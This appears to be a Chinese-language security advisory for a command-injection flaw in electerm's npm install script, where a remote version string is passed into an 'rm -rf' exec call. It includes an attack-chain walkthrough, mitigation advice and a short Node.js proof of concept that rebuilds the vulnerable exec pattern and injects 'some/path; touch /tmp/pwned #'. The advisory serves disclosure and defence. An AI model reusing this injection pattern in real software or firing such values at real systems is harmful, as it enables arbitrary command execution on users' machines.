CVE-2026-41501 electerm命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-41501

漏洞类型

命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

electerm

漏洞概述

Electerm是一个开源的终端/SSH/SFTP客户端。在3.3.8版本之前，其npm/install.js文件中的runLinux()函数存在命令注入漏洞。该函数在未经验证的情况下，将攻击者控制的远程版本字符串直接追加到exec命令中，导致任意命令执行。

技术细节

该漏洞位于electerm项目的npm/install.js文件第130行。漏洞成因是runLinux()函数在处理清理逻辑时，直接将来自网络的远程版本字符串拼接到exec('rm -rf ...')系统命令中。由于缺乏输入过滤，攻击者可以通过中间人攻击或伪造更新服务器，在版本字符串中注入Shell元字符（如分号、反引号等）。当受害者的electerm客户端执行更新或安装脚本时，注入的 payload 将随rm命令一起被执行，从而在用户系统上执行任意恶意代码，完全控制主机。

攻击链分析

STEP 1

1. 信息收集与准备

攻击者识别出electerm使用特定的API端点获取版本信息，并确定该输入被传递给系统命令执行函数。

STEP 2

2. 构造恶意Payload

攻击者构造包含Shell元字符的恶意版本字符串（例如：v1.0; whoami），旨在打破原有命令结构并注入新指令。

STEP 3

3. 诱导执行

通过中间人攻击或劫持更新源，诱导受害者运行受影响的electerm版本（< 3.3.8），触发更新或安装流程。

STEP 4

4. 漏洞触发

受害者的electerm调用runLinux()函数，获取恶意版本字符串并将其拼接到rm -rf命令中执行。

STEP 5

5. 获得控制权

注入的恶意命令在受害者系统上执行，攻击者借此获得系统权限，可能导致数据窃取或破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// Conceptual Proof of Concept for CVE-2026-41501
// This simulates the vulnerable behavior in install.js

const { exec } = require('child_process');

/**
 * Vulnerable function simulation
 * @param {string} remoteVersion - Attacker controlled input
 */
function vulnerableRunLinux(remoteVersion) {
    // The vulnerability: Direct concatenation of user input into exec
    const command = `rm -rf ${remoteVersion}`;
    console.log(`Executing command: ${command}`);
    
    exec(command, (error, stdout, stderr) => {
        if (error) {
            console.error(`Error: ${error.message}`);
            return;
        }
        console.log(`Output: ${stdout}`);
    });
}

// Exploit Scenario:
// Attacker provides a malicious version string containing command injection payload.
// Example payload: "; touch /tmp/pwned #

const maliciousVersion = "some/path; touch /tmp/pwned #";

console.log("--- Simulating Attack ---");
vulnerableRunLinux(maliciousVersion);

// Expected result:
// The system will execute: rm -rf some/path; touch /tmp/pwned #
// This creates a file named 'pwned' in /tmp, proving command execution.

影响范围

electerm < 3.3.8

防御指南

临时缓解措施

建议用户尽快检查当前使用的electerm版本。如果版本低于3.3.8，应立即停止使用并从官方渠道下载安装最新版。在无法立即升级的情况下，应限制该应用的网络访问权限，避免其连接到不可信的网络环境。